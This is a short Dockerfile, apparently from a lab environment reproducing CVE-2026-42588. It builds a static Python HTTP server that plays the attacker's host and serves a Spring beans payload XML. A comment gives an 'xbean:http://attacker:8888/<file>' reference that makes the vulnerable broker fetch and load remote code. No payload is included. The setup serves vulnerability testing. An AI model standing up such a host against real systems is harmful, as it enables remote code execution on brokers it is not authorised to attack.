# CVE-2026-42588 — attacker-controlled HTTP host
# Serves the Spring beans payload XML that the broker fetches via the
# xbean:http://attacker:8888/<file> reference. The served directory is a
# bind mount (env/attacker-www) the exploiter writes its payload into; no
# payload is baked into the image (exploit-agnostic).
FROM python:3.12-slim

WORKDIR /www
EXPOSE 8888

# Plain static file server over the bind-mounted /www directory.
CMD ["python3", "-m", "http.server", "8888", "--bind", "0.0.0.0", "--directory", "/www"]